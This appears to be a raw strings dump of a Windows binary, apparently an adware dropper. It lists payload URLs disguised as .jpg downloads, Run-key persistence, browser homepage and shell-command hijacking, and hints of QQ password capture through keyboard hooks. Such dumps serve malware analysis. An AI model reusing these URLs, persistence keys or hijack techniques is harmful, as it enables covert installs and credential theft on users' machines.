C:\Program Files\Common Files\pczh_105_48740.exe
C:\Program Files\Common Files\qhse_7654_5943.exe
C:\Program Files\Common Files\qhse_7654_5943.jpg
C:\Program Files\Common Files\qqbrowser_7654_356.exe
C:\Program Files\Common Files\qqbrowser_7654_356.jpg
C:\Program Files\Common Files\qqbrowser_7654_5943.exe
C:\Program Files\Common Files\qqbrowser_7654_5943.jpg
C:\Program Files\Common Files\qq.exe
C:\Program Files\Common Files\qqpcmgr_7654_356.exe
C:\Program Files\Common Files\qqpcmgr_7654_356.jpg
C:\Program Files\Common Files\rpk
C:\Program Files\Common Files\TD
C:\Program Files\Common Files\td.exe
C:\Program Files\Common Files\UC
C:\Program Files\Common Files\ucbrowser_7654_356.exe
C:\Program Files\Common Files\ucbrowser_7654_356.jpg
C:\Program Files\Common Files\ucbrowser_7654_5943.exe
C:\Program Files\Common Files\ucbrowser_7654_5943.jpg
C:\Program Files\Doyo\DyUninstall.exe
C:\Program Files\GSInput
C:\Program Files\GSInput\3.0.1.0512\uninst.exe
C:\Program Files\gssoft\gswb\2.8.1.1120\uninst.exe
C:\Program Files\HaoZip
C:\Program Files\HaoZip\Uninstall.exe
C:\Program Files\iQIYI\QiyiInstaller.exe
C:\Program Files\JJ
C:\Program Files\kingsoft\kingsoft antivirus\uni0nst.exe
C:\Program Files\liebao\liebao.exe
C:\Program Files\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\PPStream\unpps.exe
C:\Program Files\SogouExplorer\SogouExplorer.exe
C:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
C:\Program Files\UCBrowser\UCBrowser.exe
C:\Program Files\UCBrowser\UCBrowser.exe --wow-launch-from=desktop
C:\Program Files\UCBrowser\Uninstall.exe
C:\Program Files\yyfm0529\201407051412\Unins.exe
CreateBitmap
CreateCompatibleDC
CreateDialogIndirectParamA
CreateDIBSection
CreateDirectoryA
CreateEventA
CreateFileA
CreateMenu
CreateMutexW
CreatePatternBrush
CreatePopupMenu
CreateProcessA
CreateRoundRectRgn
CreateShortcut
CreateSolidBrush
CreateThread
CreateToolhelp32Snapshot
CreateWaitableTimerA
CreateWindowExA
CResourceException
- CRT not initialized
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
CTempDC
CTempGdiObject
CTempMenu
CTempWnd
C:\user\All Users\
CUserException
C:\users\administrator\
C:\users\Administrator\
C:\users\Administrator\Application Data\360se6\Application\360se.exe
C:\users\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Users\Administrator\Desktop\
C:\users\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\users\Administrator\Local Settings\Temp\bluefiles
C:\users\All Users\
C:\users\All Users\Desktop\
CWinApp
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system\360se
C:\WINDOWS\system\360.txt
C:\WINDOWS\system\ADSafe
C:\Windows\system\APP
C:\Windows\system\APPP
C:\WINDOWS\system\baidusd2.txt
C:\WINDOWS\system\baiduweishi2.txt
C:\WINDOWS\system\guan2.txt
C:\WINDOWS\system\leibao
C:\WINDOWS\system\QQIE.txt
C:\WINDOWS\system\QQPC.txt
C:\WINDOWS\system\uc
C:\WINDOWS\system\uc.txt
C:\WINDOWS\system\UC.txt
CWinThread
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
`default constructor closure'
DefMDIChildProcA
DefWindowProcA
DefWindowProcW
 delete
 delete[]
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
Desk=0
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
DispatchMessageA
DISPLAY
DLL ERROR
DocumentPropertiesA
DOMAIN error
D:\Program Files\Tencent\QQPCMgr\8.12.11701.227\Uninst.exe
D:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
DragAcceptFiles
DragFinish
DragQueryFileA
DrawMenuBar
DrawTextA
D$ RPj
D$<SUV
D$Tj\P
D$,WPQR
D$$WPV
D$XQRP
`dynamic atexit destructor for '
`dynamic initializer for '
&Edit,0,2
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
Embedded Object
Embed Source
EnableMenuItem
EnableWindow
EncodePointer
EndDialog
EndPaint
EnterCriticalSection
EnumDisplayMonitors
Escape
ExitProcess
Explorer
Explorer=1
Explorer /e,
Explorer /n,
Explorer /root,
Explorer /select,
ExtCreateRegion
ExtTextOutA
F,_^][
@@f98u
f9z.vk
__fastcall
February
FileName
FileNameW
FileTimeToLocalFileTime
FileTimeToSystemTime
FillRect
FindClose
FindFirstFileA
FindFirstFileW
FindNextFileA
FindResourceA
FindWindowA
FindWindowExA
- floating point not loaded
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
frmProgress
GAIsProcessorFeaturePresent
gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetAsyncKeyState
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDateFormatA
GetDesktopWindow
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesW
GetFileSize
GetFileTime
GetFileType
GetFocus
GetFolder
GetForegroundWindow
GetFullPathNameW
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuDefaultItem
GetMenuInfo
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuStringA
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetMonitorInfoA
GetNativeSystemInfo
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetParent
GetPrivateProfileStringW
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProcessWindowStation
GetPropA
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetTimeFormatA
GetTopWindow
GetUserDefaultLCID
GetUserObjectInformationA
GetVersion
GetVersionExA
GetWindow
GetWindowLongA
GetWindowPlacement
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalUnlock
Google Chrome
Google Chrome.lnk
GrayStringA
`h````
\hao123
HaoZip=1
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtpHHtl
_Hide.exe
HideProgress=0
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKEY_USERS
H:mm:ss
Host: 
HSVHWtgHHtF
htmlfile\shell\
htmlfile\shell\e\command\
http://
HTTP/1.0
http://1.soso56.com/-8434_48740_mny.jpg
http://1.soso56.com/acbbb.jpg
http://1.soso56.com/gswb_1454_7654_356.jpg
HttpAddRequestHeadersA
http://d2.freep.cn/3tb_140810210616ab0y536124.jpg
http://d3.freep.cn/3tb_140803121447kvg6536124.jpg
http://d3.freep.cn/3tb_140810105338fj9u536124.jpg
http://d3.freep.cn/3tb_140810135722petu536124.jpg
http://d3.freep.cn/3tb_140810135834c4nk536124.jpg
http://d3.freep.cn/3tb_140810141125owhb536124.jpg
http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
HTTP\shell\
HTTP\shell\e\command\
https\shell\
https\shell\e\command\
http://www.12000.com.cn/cf5.jpg
http://www.2345.com/?k98792151
http://www.duba.com/?un_2_445816
http://www.soso56.com/mima.jpg
hWj@_;
_hypot
IEFav=1
IEHome=1
InitCommonControlsEx
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InsertMenuA
InterlockedDecrement
InterlockedIncrement
InternetCloseHandle
InternetConnectA
Internet     Explorer.lnk
Internet    Explorer.lnk
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetShortcut\shell\
InternetShortcut\shell\e\command\
InvalidateRect
invalid string position
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDebuggerPresent
IsDialogMessageA
IsIconic
IsValidCodePage
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
j8j ^V
JanFebMarAprMayJunJulAugSepOctNovDec
January
kernel32
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KillTimer
KuGou=1
KuWo=0
L$0_^]
L$49l$4}
\$L9|$
lb51-20140423gd
LCMapStringA
LCMapStringW
L$DWQV
LeaveCriticalSection
Link Source
Link Source Descriptor
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadMenuA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LockResource
L$$PQh
L$<RPQ
L$,Sh 
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyn
lstrcpynA
lstrlenA
lstrlenW
l$ UPVQ
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MapWindowPoints
M/d/yy
MenuItemFromPoint
MessageBoxA
mhtmlfile\shell\
mhtmlfile\shell\e\command\
Microsoft Visual C++ Runtime Library
.mixcrt
MM/dd/yy
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveFileA
MoveFileExA
MoveWindow
Movie=0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
mscoree.dll
MsgWaitForMultipleObjects
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
\MusicFM.lnk
n0SSSSU
Native
 new[]
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
NTDLL.DLL
NtReadVirtualMemory
(null)
Object Descriptor
ObjectLink
October
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
oledlg.dll
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OLEPRO32.DLL
OleRun
OleUninitialize
`omni callsig'
&Open,0,2
OpenEventA
OpenFile
OpenPrinterA
OpenProcess
operator
OwnerLink
__pascal
Path=C:\Program Files\
PathFileExistsA
PathFindFileNameA
PathIsDirectoryA
PathMatchSpecA
PathRemoveFileSpecA
.PAVCException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
PCMgr=0
PeekMessageA
Ph_^][Y
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PostMessageA
PostQuitMessage
PostThreadMessageA
PPPPhd
PPPPPPPP
ppxxxx
PreviewPages
Process32First
Process32Next
Program: 
program internal error number is %d. 
<program name unknown>
PtInRect
__ptr64
PtVisible
- pure virtual function call
PVh`XA
PWVWWW
  QQIE
&qqpassword=  
  QQPC
QQPCTray.exe
QQSVWd
QQSVWh
QQSVWj
QSUVWj
QueryPerformanceCounter
RaiseException
RARCloseArchive
RAROpenArchiveEx
RARProcessFile
RARReadHeader
RARSetCallback
RARSetPassword
`.rdata
ReadProcessMemory
RectVisible
REG_BINARY - 
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegDisableReflectionKey
REG_DWORD - DWORD
RegEnableReflectionKey
RegEnumKeyA
RegEnumValueA
RegFlushKey
RegisterClassA
RegisterClassExA
RegisterClipboardFormatA
RegisterHotKey
RegisterWindowMessageA
REG_MULTI_SZ - 
REG_NONE - 
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
REG_REG_EXPAND_SZ - 
RegSetValueExA
REG_SZ - 
ReleaseDC
RemoveDirectoryA
RemoveMenu
RemovePropA
RestoreDC
__restrict
Rich2{
RichEdit Text and Objects
Rich Text Format
RPWWWj
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
:"%s".
Safe=0
Saturday
SaveDC
`scalar deleting destructor'
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
scripting.FileSystemObject
SelectObject
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
SetBkColor
SetClassLongA
SetCursor
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetMapMode
SetMenu
SetMenuDefaultItem
SetMenuInfo
SetMenuItemBitmaps
SetMenuItemInfoA
SetParent
SetPropA
SetRect
SetStdHandle
SetTextColor
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWaitableTimer
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
[ShdXA
shell32.dll
SHELL32.dll
ShellExecuteExW
Shell_NotifyIconA
Shell_TrayWnd
SHGetSpecialFolderPathA
shlwapi.dll
Shlwapi.dll
SHLWAPI.dll
ShowWindow
ShowWindowAsync
SING error
sO;>|C;~
software
Software\Microsoft\Internet Explorer\Main
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SoHu=0
s[S;7|G;w
SS@SSPVSS
_SSSSU
StartAuto=1
Start Page
__stdcall
StretchBlt
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SusWnd
SysPager
System
SystemParametersInfoA
t0WWWWW
t@_^]3
t8j\hp
t'9|$pt
t	9p$u
t^9(uZ
TabbedTextOutA
TargetPath
TaskbarCreated
taskmgr.exe
tb9} u
tBSh<ZC
tD9_Pt?
tD9(u@
tehDL@
\TemporaryFile
\....\TemporaryFile
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
t,h\NA
t=hpNA
t>Ht Ht
t+Ht$Ht
Thursday
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T$LURV
ToolbarWindow32
tq9w(tlSj
tR99u2
TrackMouseEvent
TrackPopupMenu
TranslateAcceleratorA
TranslateMessage
TrayNotifyWnd
t#SSUP
+ttHHtd
t.;t$$t(
Tuesday
;t$,v-
t$$VSS
tvWWWWU
T$$WRV
t+WWVPV
 Type Descriptor'
`typeof'
`udt returning'
uf9=,7I
u@h=$A
u-hq$A
uL9=|+A
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
\uninst.exe
Unknown exception
unrar.dll
UnregisterClassA
UnregisterHotKey
UpdateWindow
UQPXY]Y[
uRFGHt
URPQQhl
user32
USER32
user32.dll
User32.dll
USER32.dll
USER32.DLL
User-Agent: DownJet1.0
?UUUUUU
\$(UVW
ValidateRect
`vbase destructor'
`vbtable'
VC20XC00U
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
^VhdXA
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualFreeEx
VirtualQueryEx
v	N+D$
,&[vrH
VWh63A
VWh=$A
VWuBhL
WaitForSingleObject
Wednesday
w]h=$A
WideCharToMultiByte
WinExec
WinHelpA
wininet.dll
WININET.dll
WINSPOOL.DRV
woqqqainima de a
Wow64DisableWow64FsRedirection
Wow64RevertWow64FsRedirection
WPh8YA
\WPS Office 
(wqt\HHtS
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringA
wshom.ocx
WshShell
wsprintfA
WTWindow
WwktZ=
"WWSh`XA
xppwpp
xpxxxx
>=Yt/j
_^][YY
\yyfm0529
YYu-9D$
YYuTVWh
yyyy-MM-dd
Z9K|uU
ZwQueryInformationProcess